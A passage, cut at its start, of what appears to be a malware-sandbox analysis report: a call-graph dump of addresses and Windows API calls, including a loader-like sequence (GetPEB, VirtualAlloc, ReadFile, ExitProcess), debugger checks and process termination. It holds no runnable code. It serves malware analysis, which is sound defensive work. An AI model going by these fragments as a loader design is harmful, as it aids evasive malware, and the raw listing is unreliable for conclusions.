c47ef9 99503->99506 99505 c60ff6 Mailbox 59 API calls 99504->99505 99505->99506 99506->99446 99508 c434d4 99507->99508 99512 c434f3 _memmove 99507->99512 99510 c60ff6 Mailbox 59 API calls 99508->99510 99509 c60ff6 Mailbox 59 API calls 99511 c4350a 99509->99511 99510->99512 99511->99465 99512->99509 99513->99460 99515 c7e847 99514->99515 99516 c46c15 99514->99516 99698 c9fcb1 89 API calls 4 library calls 99515->99698 99631 c45906 60 API calls Mailbox 99516->99631 99519 c7e85a 99699 c9fcb1 89 API calls 4 library calls 99519->99699 99520 c46c37 99632 c45956 67 API calls 99520->99632 99522 c46c4c 99522->99519 99524 c46c54 99522->99524 99525 c477c7 59 API calls 99524->99525 99527 c46c60 99525->99527 99526 c7e876 99558 c46cc1 99526->99558 99633 c60b9b 60 API calls __ftell_nolock 99527->99633 99529 c46c6c 99532 c477c7 59 API calls 99529->99532 99530 c46ccf 99534 c477c7 59 API calls 99530->99534 99531 c7e889 99533 c45dcf CloseHandle 99531->99533 99535 c46c78 99532->99535 99536 c7e895 99533->99536 99537 c46cd8 99534->99537 99538 c448ae 60 API calls 99535->99538 99539 c44f3d 136 API calls 99536->99539 99540 c477c7 59 API calls 99537->99540 99542 c46c86 99538->99542 99543 c7e8b1 99539->99543 99541 c46ce1 99540->99541 99636 c446f9 99541->99636 99634 c459b0 ReadFile SetFilePointerEx 99542->99634 99546 c7e8da 99543->99546 99550 ca97e5 122 API calls 99543->99550 99700 c9fcb1 89 API calls 4 library calls 99546->99700 99547 c46cf8 99552 c47c8e 59 API calls 99547->99552 99549 c46cb2 99635 c45c4e SetFilePointerEx SetFilePointerEx 99549->99635 99551 c7e8cd 99550->99551 99555 c7e8f6 99551->99555 99556 c7e8d5 99551->99556 99557 c46d09 SetCurrentDirectoryW 99552->99557 99553 c7e8f1 99585 c46e6c Mailbox 99553->99585 99560 c44faa 84 API calls 99555->99560 99559 c44faa 84 API calls 99556->99559 99563 c46d1c Mailbox 99557->99563 99558->99530 99558->99531 99559->99546 99561 c7e8fb 99560->99561 99562 c60ff6 Mailbox 59 API calls 99561->99562 99569 c7e92f 99562->99569 99565 c60ff6 Mailbox 59 API calls 99563->99565 99567 c46d2f 99565->99567 99566 c43bcd 99566->98476 99566->98500 99568 c4538e 59 API calls 99567->99568 99596 c46d3a Mailbox __wsetenvp 99568->99596 99570 c4766f 59 API calls 99569->99570 99604 c7e978 Mailbox 99570->99604 99571 c46e47 99694 c45dcf 99571->99694 99572 c7eb69 99705 ca7581 59 API calls Mailbox 99572->99705 99575 c46e53 SetCurrentDirectoryW 99575->99585 99578 c7eb8b 99706 caf835 59 API calls 2 library calls 99578->99706 99581 c7eb98 99583 c62f95 _free 58 API calls 99581->99583 99582 c7ec02 99709 c9fcb1 89 API calls 4 library calls 99582->99709 99583->99585 99626 c45934 99585->99626 99587 c4766f 59 API calls 99587->99604 99588 c7ec1b 99588->99571 99590 c7ebfa 99708 c9fb07 59 API calls 4 library calls 99590->99708 99591 c47f41 59 API calls 99591->99596 99596->99571 99596->99582 99596->99590 99596->99591 99687 c459cd 67 API calls _wcscpy 99596->99687 99688 c470bd GetStringTypeW 99596->99688 99689 c4702c 60 API calls __wcsnicmp 99596->99689 99690 c4710a GetStringTypeW __wsetenvp 99596->99690 99691 c6387d GetStringTypeW _iswctype 99596->99691 99692 c46a3c 165 API calls 3 library calls 99596->99692 99693 c47373 59 API calls Mailbox 99596->99693 99597 c47f41 59 API calls 99597->99604 99601 c7ebbb 99707 c9fcb1 89 API calls 4 library calls 99601->99707 99603 c7ebd4 99605 c62f95 _free 58 API calls 99603->99605 99604->99572 99604->99587 99604->99597 99604->99601 99701 c9fc4d 59 API calls 2 library calls 99604->99701 99702 c9fb6e 61 API calls 2 library calls 99604->99702 99703 ca7621 59 API calls Mailbox 99604->99703 99704 c47373 59 API calls Mailbox 99604->99704 99606 c7ebe7 99605->99606 99606->99585 99608 c4770f 99607->99608 99611 c47682 _memmove 99607->99611 99610 c60ff6 Mailbox 59 API calls 99608->99610 99609 c60ff6 Mailbox 59 API calls 99612 c47689 99609->99612 99610->99611 99611->99609 99613 c60ff6 Mailbox 59 API calls 99612->99613 99614 c476b2 99612->99614 99613->99614 99614->99486 99616 c474d0 99615->99616 99618 c4757e 99615->99618 99617 c60ff6 Mailbox 59 API calls 99616->99617 99620 c47502 99616->99620 99617->99620 99618->99486 99619 c60ff6 59 API calls Mailbox 99619->99620 99620->99618 99620->99619 99621->99485 99622->99486 99623->99486 99624->99486 99625->99491 99627 c45dcf CloseHandle 99626->99627 99628 c4593c Mailbox 99627->99628 99629 c45dcf CloseHandle 99628->99629 99630 c4594b 99629->99630 99630->99566 99631->99520 99632->99522 99633->99529 99634->99549 99635->99558 99637 c477c7 59 API calls 99636->99637 99638 c4470f 99637->99638 99639 c477c7 59 API calls 99638->99639 99640 c44717 99639->99640 99641 c477c7 59 API calls 99640->99641 99642 c4471f 99641->99642 99643 c477c7 59 API calls 99642->99643 99644 c44727 99643->99644 99645 c7d8fb 99644->99645 99646 c4475b 99644->99646 99647 c481a7 59 API calls 99645->99647 99648 c479ab 59 API calls 99646->99648 99649 c7d904 99647->99649 99650 c44769 99648->99650 99651 c47eec 59 API calls 99649->99651 99652 c47e8c 59 API calls 99650->99652 99654 c4479e 99651->99654 99653 c44773 99652->99653 99653->99654 99655 c479ab 59 API calls 99653->99655 99656 c447de 99654->99656 99658 c447bd 99654->99658 99669 c7d924 99654->99669 99659 c44794 99655->99659 99710 c479ab 99656->99710 99663 c47b52 59 API calls 99658->99663 99662 c47e8c 59 API calls 99659->99662 99660 c447ef 99664 c44801 99660->99664 99667 c481a7 59 API calls 99660->99667 99661 c7d9f4 99665 c47d2c 59 API calls 99661->99665 99662->99654 99666 c447c7 99663->99666 99668 c44811 99664->99668 99671 c481a7 59 API calls 99664->99671 99677 c7d9b1 99665->99677 99666->99656 99670 c479ab 59 API calls 99666->99670 99667->99664 99673 c44818 99668->99673 99674 c481a7 59 API calls 99668->99674 99669->99661 99672 c7d9dd 99669->99672 99684 c7d95b 99669->99684 99670->99656 99671->99668 99672->99661 99679 c7d9c8 99672->99679 99675 c4481f Mailbox 99673->99675 99676 c481a7 59 API calls 99673->99676 99674->99673 99675->99547 99676->99675 99677->99656 99678 c47b52 59 API calls 99677->99678 99723 c47a84 59 API calls 2 library calls 99677->99723 99678->99677 99681 c47d2c 59 API calls 99679->99681 99680 c7d9b9 99682 c47d2c 59 API calls 99680->99682 99681->99677 99682->99677 99684->99680 99685 c7d9a4 99684->99685 99686 c47d2c 59 API calls 99685->99686 99686->99677 99687->99596 99688->99596 99689->99596 99690->99596 99691->99596 99692->99596 99693->99596 99695 c45de8 99694->99695 99696 c45dd9 99694->99696 99695->99696 99697 c45ded CloseHandle 99695->99697 99696->99575 99697->99696 99698->99519 99699->99526 99700->99553 99701->99604 99702->99604 99703->99604 99704->99604 99705->99578 99706->99581 99707->99603 99708->99582 99709->99588 99711 c47a17 99710->99711 99712 c479ba 99710->99712 99713 c47e8c 59 API calls 99711->99713 99712->99711 99714 c479c5 99712->99714 99720 c479e8 _memmove 99713->99720 99715 c479e0 99714->99715 99716 c7ef32 99714->99716 99724 c48087 59 API calls Mailbox 99715->99724 99717 c48189 59 API calls 99716->99717 99719 c7ef3c 99717->99719 99721 c60ff6 Mailbox 59 API calls 99719->99721 99720->99660 99722 c7ef5c 99721->99722 99723->99677 99724->99720 99726 c46ef5 99725->99726 99730 c47009 99725->99730 99727 c60ff6 Mailbox 59 API calls 99726->99727 99726->99730 99729 c46f1c 99727->99729 99728 c60ff6 Mailbox 59 API calls 99731 c46f91 99728->99731 99729->99728 99730->98615 99731->99730 99733 c474bd 59 API calls 99731->99733 99735 c4766f 59 API calls 99731->99735 99738 c463a0 94 API calls 2 library calls 99731->99738 99739 c96ac9 59 API calls Mailbox 99731->99739 99733->99731 99735->99731 99736->98617 99737->98619 99738->99731 99739->99731 99740->98633 99741->98634 99743 c44227 99742->99743 99744 c7d638 99742->99744 99743->98643 99768 ca3226 62 API calls _W_store_winword 99743->99768 99744->99743 99745 c7d641 DestroyIcon 99744->99745 99745->99743 99747 c44200 Mailbox 99746->99747 99748 c44129 99746->99748 99747->98646 99769 c47b76 99748->99769 99751 c44144 99753 c47d2c 59 API calls 99751->99753 99752 c7d5dd LoadStringW 99755 c7d5f7 99752->99755 99754 c44159 99753->99754 99754->99755 99756 c4416a 99754->99756 99757 c47c8e 59 API calls 99755->99757 99758 c44174 99756->99758 99759 c44205 99756->99759 99762 c7d601 99757->99762 99761 c47c8e 59 API calls 99758->99761 99760 c481a7 59 API calls 99759->99760 99765 c4417e _memset _wcscpy 99760->99765 99761->99765 99763 c47e0b 59 API calls 99762->99763 99762->99765 99764 c7d623 99763->99764 99767 c47e0b 59 API calls 99764->99767 99766 c441e6 Shell_NotifyIconW 99765->99766 99766->99747 99767->99765 99768->98643 99770 c60ff6 Mailbox 59 API calls 99769->99770 99771 c47b9b 99770->99771 99772 c48189 59 API calls 99771->99772 99773 c44137 99772->99773 99773->99751 99773->99752 99775 c4e835 99774->99775 99776 c83ed3 99775->99776 99780 c4e89f 99775->99780 99791 c4e8f9 99775->99791 99848 c4a000 99776->99848 99777 c4ebe1 99781 c477c7 59 API calls 99777->99781 99792 c4ead0 Mailbox 99777->99792 99779 c83ee8 99779->99792 99871 caa0b5 89 API calls 4 library calls 99779->99871 99780->99777 99783 c477c7 59 API calls 99780->99783 99780->99791 99784 c83f67 99781->99784 99785 c83f2e 99783->99785 99786 c62f80 __cinit 67 API calls 99784->99786 99787 c62f80 __cinit 67 API calls 99785->99787 99786->99792 99787->99791 99788 c83f50 99788->98688 99789 caa0b5 89 API calls 99789->99792 99790 c48620 69 API calls 99790->99792 99791->99777 99791->99788 99791->99792 99795 c4eaba 99791->99795 99792->99789 99792->99790 99793 c4f2f5 99792->99793 99797 c4a000 341 API calls 99792->99797 99801 c48ea0 59 API calls 99792->99801 99806 c4ebd8 99792->99806 99847 c480d7 59 API calls 2 library calls 99792->99847 99873 c97405 59 API calls 99792->99873 99874 cbc8d7 341 API calls 99792->99874 99875 cbb851 341 API calls Mailbox 99792->99875 99877 c49df0 59 API calls Mailbox 99792->99877 99878 cb96db 341 API calls Mailbox 99792->99878 99876 caa0b5 89 API calls 4 library calls 99793->99876 99795->99792 99872 caa0b5 89 API calls 4 library calls 99795->99872 99797->99792 99800 c8424f 99800->98688 99801->99792 99806->98688 99808 c4f7b0 99807->99808 99809 c4f61a 99807->99809 99812 c47f41 59 API calls 99808->99812 99810 c84848 99809->99810 99811 c4f626 99809->99811 99973 cbbf80 341 API calls Mailbox 99810->99973 99971 c4f3f0 341 API calls 2 library calls 99811->99971 99818 c4f6ec Mailbox 99812->99818 99815 c84856 99819 c4f790 99815->99819 99974 caa0b5 89 API calls 4 library calls 99815->99974 99817 c4f65d 99817->99815 99817->99818 99817->99819 99885 cacde5 99818->99885 99965 ca3e73 99818->99965 99968 cbe237 99818->99968 99819->98688 99821 c4f743 99821->99819 99972 c49df0 59 API calls Mailbox 99821->99972 99825->98688 99826->98688 99827->98688 99828->98653 99829->98657 99830->98688 99831->98662 99832->98662 99833->98662 99834->98688 99835->98688 99836->98688 99837->98688 99838->98688 99839->98688 99840->98703 99841->98703 99842->98703 99843->98703 99844->98703 99845->98703 99846->98703 99847->99792 99849 c4a01f 99848->99849 99868 c4a04d Mailbox 99848->99868 99850 c60ff6 Mailbox 59 API calls 99849->99850 99850->99868 99851 c4b5d5 99853 c481a7 59 API calls 99851->99853 99852 c4b5da 99884 caa0b5 89 API calls 4 library calls 99852->99884 99866 c4a1b7 99853->99866 99854 c97405 59 API calls 99854->99868 99857 c60ff6 59 API calls Mailbox 99857->99868 99858 c481a7 59 API calls 99858->99868 99859 c8047f 99881 caa0b5 89 API calls 4 library calls 99859->99881 99861 c477c7 59 API calls 99861->99868 99864 c8048e 99864->99779 99865 c62f80 67 API calls __cinit 99865->99868 99866->99779 99867 c80e00 99883 caa0b5 89 API calls 4 library calls 99867->99883 99868->99851 99868->99852 99868->99854 99868->99857 99868->99858 99868->99859 99868->99861 99868->99865 99868->99866 99868->99867 99870 c4a6ba 99868->99870 99879 c4ca20 341 API calls 2 library calls 99868->99879 99880 c4ba60 60 API calls Mailbox 99868->99880 99882 caa0b5 89 API calls 4 library calls 99870->99882 99871->99792 99872->99792 99873->99792 99874->99792 99875->99792 99876->99800 99877->99792 99878->99792 99879->99868 99880->99868 99881->99864 99882->99866 99883->99852 99884->99866 99886 c477c7 59 API calls 99885->99886 99887 cace1a 99886->99887 99888 c477c7 59 API calls 99887->99888 99889 cace23 99888->99889 99890 cace37 99889->99890 100084 c49c9c 59 API calls 99889->100084 99892 c49997 84 API calls 99890->99892 99893 cace54 99892->99893 99894 cace76 99893->99894 99895 cacf55 99893->99895 99901 cacf85 Mailbox 99893->99901 99896 c49997 84 API calls 99894->99896 99897 c44f3d 136 API calls 99895->99897 99899 cace82 99896->99899 99898 cacf69 99897->99898 99900 cacf81 99898->99900 99904 c44f3d 136 API calls 99898->99904 99902 c481a7 59 API calls 99899->99902 99900->99901 99905 c477c7 59 API calls 99900->99905 99901->99821 99903 cace8e 99902->99903 99908 cacea2 99903->99908 99909 caced4 99903->99909 99904->99900 99906 cacfb6 99905->99906 99907 c477c7 59 API calls 99906->99907 99910 cacfbf 99907->99910 99911 c481a7 59 API calls 99908->99911 99912 c49997 84 API calls 99909->99912 99913 c477c7 59 API calls 99910->99913 99914 caceb2 99911->99914 99915 cacee1 99912->99915 99916 cacfc8 99913->99916 99918 c47e0b 59 API calls 99914->99918 99919 c481a7 59 API calls 99915->99919 99917 c477c7 59 API calls 99916->99917 99920 cacfd1 99917->99920 99921 cacebc 99918->99921 99922 caceed 99919->99922 99924 c49997 84 API calls 99920->99924 99925 c49997 84 API calls 99921->99925 100085 ca4cd3 GetFileAttributesW 99922->100085 99927 cacfde 99924->99927 99928 cacec8 99925->99928 99926 cacef6 99929 cacf09 99926->99929 99932 c47b52 59 API calls 99926->99932 99930 c446f9 59 API calls 99927->99930 99931 c47c8e 59 API calls 99928->99931 99934 c49997 84 API calls 99929->99934 99937 cacf0f 99929->99937 99933 cacff9 99930->99933 99931->99909 99932->99929 99935 c47b52 59 API calls 99933->99935 99936 cacf36 99934->99936 99938 cad008 99935->99938 100086 ca3a2b 75 API calls Mailbox 99936->100086 99937->99901 99940 cad03c 99938->99940 99942 c47b52 59 API calls 99938->99942 99941 c481a7 59 API calls 99940->99941 99943 cad04a 99941->99943 99944 cad019 99942->99944 99945 c47c8e 59 API calls 99943->99945 99944->99940 99947 c47d2c 59 API calls 99944->99947 99946 cad058 99945->99946 99948 c47c8e 59 API calls 99946->99948 99949 cad02e 99947->99949 99950 cad066 99948->99950 99951 c47d2c 59 API calls 99949->99951 99952 c47c8e 59 API calls 99950->99952 99951->99940 99953 cad074 99952->99953 99954 c49997 84 API calls 99953->99954 99955 cad080 99954->99955 99975 ca42ad 99955->99975 99957 cad091 99958 ca3e73 3 API calls 99957->99958 99959 cad09b 99958->99959 99960 c49997 84 API calls 99959->99960 99963 cad0cc 99959->99963 99961 cad0b9 99960->99961 100029 ca93df 99961->100029 99964 c44faa 84 API calls 99963->99964 99964->99901 100134 ca4696 GetFileAttributesW 99965->100134 100138 cbcdf1 99968->100138 99970 cbe247 99970->99821 99971->99817 99972->99821 99973->99815 99974->99819 99976 ca42c9 99975->99976 99977 ca42ce 99976->99977 99978 ca42dc 99976->99978 99980 c481a7 59 API calls 99977->99980 99979 c477c7 59 API calls 99978->99979 99982 ca42e4 99979->99982 99981 ca42d7 Mailbox 99980->99981 99981->99957 99983 c477c7 59 API calls 99982->99983 99984 ca42ec 99983->99984 99985 c477c7 59 API calls 99984->99985 99986 ca42f7 99985->99986 99987 c477c7 59 API calls 99986->99987 99988 ca42ff 99987->99988 99989 c477c7 59 API calls 99988->99989 99990 ca4307 99989->99990 99991 c477c7 59 API calls 99990->99991 99992 ca430f 99991->99992 99993 c477c7 59 API calls 99992->99993 99994 ca4317 99993->99994 99995 c477c7 59 API calls 99994->99995 99996 ca431f 99995->99996 99997 c446f9 59 API calls 99996->99997 99998 ca4336 99997->99998 99999 c446f9 59 API calls 99998->99999 100000 ca434f 99999->100000 100001 c47b52 59 API calls 100000->100001 100002 ca435b 100001->100002 100003 ca436e 100002->100003 100004 c47e8c 59 API calls 100002->100004 100005 c47b52 59 API calls 100003->100005 100004->100003 100006 ca4377 100005->100006 100007 ca4387 100006->100007 100009 c47e8c 59 API calls 100006->100009 100008 c481a7 59 API calls 100007->100008 100010 ca4393 100008->100010 100009->100007 100011 c47c8e 59 API calls 100010->100011 100012 ca439f 100011->100012 100087 ca445f 59 API calls 100012->100087 100014 ca43ae 100088 ca445f 59 API calls 100014->100088 100016 ca43c1 100017 c47b52 59 API calls 100016->100017 100018 ca43cb 100017->100018 100019 ca43e2 100018->100019 100020 ca43d0 100018->100020 100022 c47b52 59 API calls 100019->100022 100021 c47e0b 59 API calls 100020->100021 100023 ca43dd 100021->100023 100024 ca43eb 100022->100024 100027 c47c8e 59 API calls 100023->100027 100025 ca4409 100024->100025 100026 c47e0b 59 API calls 100024->100026 100028 c47c8e 59 API calls 100025->100028 100026->100023 100027->100025 100028->99981 100030 ca93ec __ftell_nolock 100029->100030 100031 c60ff6 Mailbox 59 API calls 100030->100031 100032 ca9449 100031->100032 100033 c4538e 59 API calls 100032->100033 100034 ca9453 100033->100034 100089 ca91e9 100034->100089 100036 ca945e 100037 c45045 85 API calls 100036->100037 100038 ca9471 _wcscmp 100037->100038 100039 ca9542 100038->100039 100040 ca9495 100038->100040 100112 ca99be 96 API calls 2 library calls 100039->100112 100109 ca99be 96 API calls 2 library calls 100040->100109 100043 ca949a 100046 ca954b 100043->100046 100110 c6432e 58 API calls __wsplitpath_helper 100043->100110 100045 c4506b 74 API calls 100047 ca9567 100045->100047 100046->99963 100048 c4506b 74 API calls 100047->100048 100050 ca9577 100048->100050 100049 ca94c3 _wcscat _wcscpy 100111 c6432e 58 API calls __wsplitpath_helper 100049->100111 100051 c4506b 74 API calls 100050->100051 100053 ca9592 100051->100053 100054 c4506b 74 API calls 100053->100054 100055 ca95a2 100054->100055 100056 c4506b 74 API calls 100055->100056 100058 ca95bd 100056->100058 100057 ca950e _wcscat 100057->100045 100057->100046 100059 c4506b 74 API calls 100058->100059 100060 ca95cd 100059->100060 100061 c4506b 74 API calls 100060->100061 100062 ca95dd 100061->100062 100063 c4506b 74 API calls 100062->100063 100064 ca95ed 100063->100064 100092 ca9b6d GetTempPathW GetTempFileNameW 100064->100092 100066 ca95f9 100067 c6548b 115 API calls 100066->100067 100077 ca960a 100067->100077 100068 ca96c4 100069 c655d6 __fcloseall 83 API calls 100068->100069 100070 ca96cf 100069->100070 100072 ca96e9 100070->100072 100073 ca96d5 DeleteFileW 100070->100073 100071 c4506b 74 API calls 100071->100077 100074 ca978f CopyFileW 100072->100074 100079 ca96f3 _wcsncpy 100072->100079 100073->100046 100075 ca97b7 DeleteFileW 100074->100075 100076 ca97a5 DeleteFileW 100074->100076 100106 ca9b2c CreateFileW 100075->100106 100076->100046 100077->100046 100077->100068 100077->100071 100093 c64a93 100077->100093 100113 ca8d90 116 API calls __fcloseall 100079->100113 100082 ca977a 100082->100075 100083 ca977e DeleteFileW 100082->100083 100083->100046 100084->99890 100085->99926 100086->99937 100087->100014 100088->100016 100114 c6543a GetSystemTimeAsFileTime 100089->100114 100091 ca91f8 100091->100036 100092->100066 100094 c64a9f __read 100093->100094 100095 c64ad5 100094->100095 100096 c64abd 100094->100096 100097 c64acd __read 100094->100097 100098 c66e4e __lock_file 59 API calls 100095->100098 100128 c68d68 58 API calls __getptd_noexit 100096->100128 100097->100077 100100 c64adb 100098->100100 100116 c6493a 100100->100116 100101 c64ac2 100129 c68ff6 9 API calls __read 100101->100129 100107 ca9b68 100106->100107 100108 ca9b52 SetFileTime CloseHandle 100106->100108 100107->100046 100108->100107 100109->100043 100110->100049 100111->100057 100112->100057 100113->100082 100115 c65468 __aulldiv 100114->100115 100115->100091 100119 c64949 100116->100119 100122 c64967 100116->100122 100117 c64957 100131 c68d68 58 API calls __getptd_noexit 100117->100131 100119->100117 100119->100122 100123 c64981 _memmove 100119->100123 100120 c6495c 100132 c68ff6 9 API calls __read 100120->100132 100130 c64b0d LeaveCriticalSection LeaveCriticalSection _fseek 100122->100130 100123->100122 100125 c64c6d __flush 78 API calls 100123->100125 100126 c64916 _fprintf 58 API calls 100123->100126 100127 c6dac6 __write 78 API calls 100123->100127 100133 c6b05e 78 API calls 7 library calls 100123->100133 100125->100123 100126->100123 100127->100123 100128->100101 100129->100097 100130->100097 100131->100120 100132->100122 100133->100123 100135 ca3e7a 100134->100135 100136 ca46b1 FindFirstFileW 100134->100136 100135->99821 100136->100135 100137 ca46c6 FindClose 100136->100137 100137->100135 100139 c49997 84 API calls 100138->100139 100140 cbce2e 100139->100140 100164 cbce75 Mailbox 100140->100164 100176 cbdab9 100140->100176 100142 cbd0cd 100143 cbd242 100142->100143 100147 cbd0db 100142->100147 100215 cbdbdc 92 API calls Mailbox 100143->100215 100146 cbd251 100146->100147 100148 cbd25d 100146->100148 100189 cbcc82 100147->100189 100148->100164 100149 c49997 84 API calls 100167 cbcec6 Mailbox 100149->100167 100154 cbd114 100204 c60e48 100154->100204 100157 cbd12e 100210 caa0b5 89 API calls 4 library calls 100157->100210 100158 cbd147 100159 c4942e 59 API calls 100158->100159 100162 cbd153 100159->100162 100161 cbd139 GetCurrentProcess TerminateProcess 100161->100158 100163 c491b0 59 API calls 100162->100163 100165 cbd169 100163->100165 100164->99970 100175 cbd190 100165->100175 100211 c48ea0 59 API calls Mailbox 100165->100211 100167->100142 100167->100149 100167->100164 100208 caf835 59 API calls 2 library calls 100167->100208 100209 cbd2f3 61 API calls 2 library calls 100167->100209 100168 cbd2b8 100168->100164 100172 cbd2cc FreeLibrary 100168->100172 100169 cbd17f 100212 cbd95d 107 API calls _free 100169->100212 100172->100164 100175->100168 100213 c48ea0 59 API calls Mailbox 100175->100213 100214 c49e9c 60 API calls Mailbox 100175->100214 100216 cbd95d 107 API calls _free 100175->100216 100177 c47faf 59 API calls 100176->100177 100178 cbdad4 CharLowerBuffW 100177->100178 100217 c9f658 100178->100217 100182 c477c7 59 API calls 100183 cbdb0d 100182->100183 100184 c479ab 59 API calls 100183->100184 100186 cbdb24 100184->100186 100185 cbdb6c Mailbox 100185->100167 100187 c47e8c 59 API calls 100186->100187 100188 cbdb30 Mailbox 100187->100188 100188->100185 100224 cbd2f3 61 API calls 2 library calls 100188->100224 100190 cbcc9d 100189->100190 100194 cbccf2 100189->100194 100191 c60ff6 Mailbox 59 API calls 100190->100191 100193 cbccbf 100191->100193 100192 c60ff6 Mailbox 59 API calls 100192->100193 100193->100192 100193->100194 100195 cbdd64 100194->100195 100196 cbdf8d Mailbox 100195->100196 100203 cbdd87 _strcat _wcscpy __wsetenvp 100195->100203 100196->100154 100197 c49c9c 59 API calls 100197->100203 100198 c49d46 59 API calls 100198->100203 100199 c49cf8 59 API calls 100199->100203 100200 c6594c 58 API calls _W_store_winword 100200->100203 100201 c49997 84 API calls 100201->100203 100203->100196 100203->100197 100203->100198 100203->100199 100203->100200 100203->100201 100227 ca5b29 61 API calls 2 library calls 100203->100227 100205 c60e5d 100204->100205 100206 c60ef5 VirtualAlloc 100205->100206 100207 c60ec3 100205->100207 100206->100207 100207->100157 100207->100158 100208->100167 100209->100167 100210->100161 100211->100169 100212->100175 100213->100175 100214->100175 100215->100146 100216->100175 100218 c9f683 __wsetenvp 100217->100218 100219 c9f6c2 100218->100219 100222 c9f6b8 100218->100222 100223 c9f769 100218->100223 100219->100182 100219->100188 100222->100219 100225 c47a24 61 API calls 100222->100225 100223->100219 100226 c47a24 61 API calls 100223->100226 100224->100185 100225->100222 100226->100223 100227->100203 100229 c47dbf __wsetenvp 100228->100229 100230 c48189 59 API calls 100229->100230 100231 c47dd0 _memmove 100229->100231 100232 c7f130 _memmove 100230->100232 100231->98739 100233 c43633 100234 c4366a 100233->100234 100235 c436e7 100234->100235 100236 c43688 100234->100236 100273 c436e5 100234->100273 100240 c436ed 100235->100240 100241 c7d31c 100235->100241 100237 c43695 100236->100237 100238 c4375d PostQuitMessage 100236->100238 100242 c436a0 100237->100242 100243 c7d38f 100237->100243 100274 c436d8 100238->100274 100239 c436ca DefWindowProcW 100239->100274 100245 c43715 SetTimer RegisterWindowMessageW 100240->100245 100246 c436f2 100240->100246 100283 c511d0 10 API calls Mailbox 100241->100283 100247 c43767 100242->100247 100248 c436a8 100242->100248 100287 ca2a16 71 API calls _memset 100243->100287 100249 c4373e CreatePopupMenu 100245->100249 100245->100274 100252 c7d2bf 100246->100252 100253 c436f9 KillTimer 100246->100253 100281 c44531 64 API calls _memset 100247->100281 100255 c7d374 100248->100255 100256 c436b3 100248->100256 100249->100274 100251 c7d343 100284 c511f3 341 API calls Mailbox 100251->100284 100259 c7d2c4 100252->100259 100260 c7d2f8 MoveWindow 100252->100260 100278 c444cb Shell_NotifyIconW _memset 100253->100278 100255->100239 100286 c9817e 59 API calls Mailbox 100255->100286 100262 c4374b 100256->100262 100264 c436be 100256->100264 100266 c7d2e7 SetFocus 100259->100266 100267 c7d2c8 100259->100267 100260->100274 100261 c4370c 100279 c43114 DeleteObject DestroyWindow Mailbox 100261->100279 100280 c445df 81 API calls _memset 100262->100280 100263 c7d3a1 100263->100239 100263->100274 100264->100239 100285 c444cb Shell_NotifyIconW _memset 100264->100285 100265 c4375b 100265->100274 100266->100274 100267->100264 100268 c7d2d1 100267->100268 100282 c511d0 10 API calls Mailbox 100268->100282 100273->100239 100276 c7d368 100277 c443db 68 API calls 100276->100277 100277->100273 100278->100261 100279->100274 100280->100265 100281->100265 100282->100274 100283->100251 100284->100264 100285->100276 100286->100273 100287->100263 100288 17823b0 100302 1780000 100288->100302 100290 178246b 100305 17822a0 100290->100305 100292 1782494 CreateFileW 100294 17824e8 100292->100294 100295 17824e3 100292->100295 100294->100295 100296 17824ff VirtualAlloc 100294->100296 100296->100295 100297 178251d ReadFile 100296->100297 100297->100295 100298 1782538 100297->100298 100299 17812a0 13 API calls 100298->100299 100300 178256b 100299->100300 100301 178258e ExitProcess 100300->100301 100301->100295 100308 1783490 GetPEB 100302->100308 100304 178068b 100304->100290 100306 17822a9 Sleep 100305->100306 100307 17822b7 100306->100307 100309 17834ba 100308->100309 100309->100304 100310 c4107d 100315 c471eb 100310->100315 100312 c4108c 100313 c62f80 __cinit 67 API calls 100312->100313 100314 c41096 100313->100314 100316 c471fb __ftell_nolock 100315->100316 100317 c477c7 59 API calls 100316->100317 100318 c472b1 100317->100318 100319 c44864 61 API calls 100318->100319 100320 c472ba 100319->100320 100346 c6074f 100320->100346 100323 c47e0b 59 API calls 100324 c472d3 100323->100324 100325 c43f84 59 API calls 100324->100325 100326 c472e2 100325->100326 100327 c477c7 59 API calls 100326->100327 100328 c472eb 100327->100328 100329 c47eec 59 API calls 100328->100329 100330 c472f4 RegOpenKeyExW 100329->100330 100331 c7ecda RegQueryValueExW 100330->100331 100335 c47316 Mailbox 100330->100335 100332 c7ecf7 100331->100332 100333 c7ed6c RegCloseKey 100331->100333 100334 c60ff6 Mailbox 59 API calls 100332->100334 100333->100335 100339 c7ed7e _wcscat Mailbox __wsetenvp 100333->100339 100336 c7ed10 100334->100336 100335->100312 100338 c4538e 59 API calls 100336->100338 100337 c47b52 59 API calls 100337->100339 100340 c7ed1b RegQueryValueExW 100338->100340 100339->100335 100339->100337 100344 c47f41 59 API calls 100339->100344 100345 c43f84 59 API calls 100339->100345 100341 c7ed38 100340->100341 100343 c7ed52 100340->100343 100342 c47d2c 59 API calls 100341->100342 100342->100343 100343->100333 100344->100339 100345->100339 100347 c71b90 __ftell_nolock 100346->100347 100348 c6075c GetFullPathNameW 100347->100348 100349 c6077e 100348->100349 100350 c47d2c 59 API calls 100349->100350 100351 c472c5 100350->100351 100351->100323 100352 ca8f97 100353 ca8fa4 100352->100353 100356 ca8faa 100352->100356 100354 c62f95 _free 58 API calls 100353->100354 100354->100356 100355 ca8fbb 100358 ca8fcd 100355->100358 100359 c62f95 _free 58 API calls 100355->100359 100356->100355 100357 c62f95 _free 58 API calls 100356->100357 100357->100355 100359->100358 100360 c80226 100366 c4ade2 Mailbox 100360->100366 100362 c80c86 100374 c966f4 59 API calls Mailbox 100362->100374 100364 c80c8f 100366->100362 100366->100364 100367 c800e0 VariantClear 100366->100367 100368 c4b6c1 100366->100368 100370 cbe237 130 API calls 100366->100370 100371 c49df0 59 API calls Mailbox 100366->100371 100372 c97405 59 API calls 100366->100372 100367->100366 100373 caa0b5 89 API calls 4 library calls 100368->100373 100370->100366 100371->100366 100372->100366 100373->100362 100374->100364

                                                  Executed Functions

                                                  Function 00C43B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C43B7A
                                                  • IsDebuggerPresent.KERNEL32 ref: 00C43B8C
                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,00D062F8,00D062E0,?,?), ref: 00C43BFD
                                                    • Part of subcall function 00C47D2C: _memmove.LIBCMT ref: 00C47D66
                                                    • Part of subcall function 00C50A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C43C26,00D062F8,?,?,?), ref: 00C50ACE
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C43C81
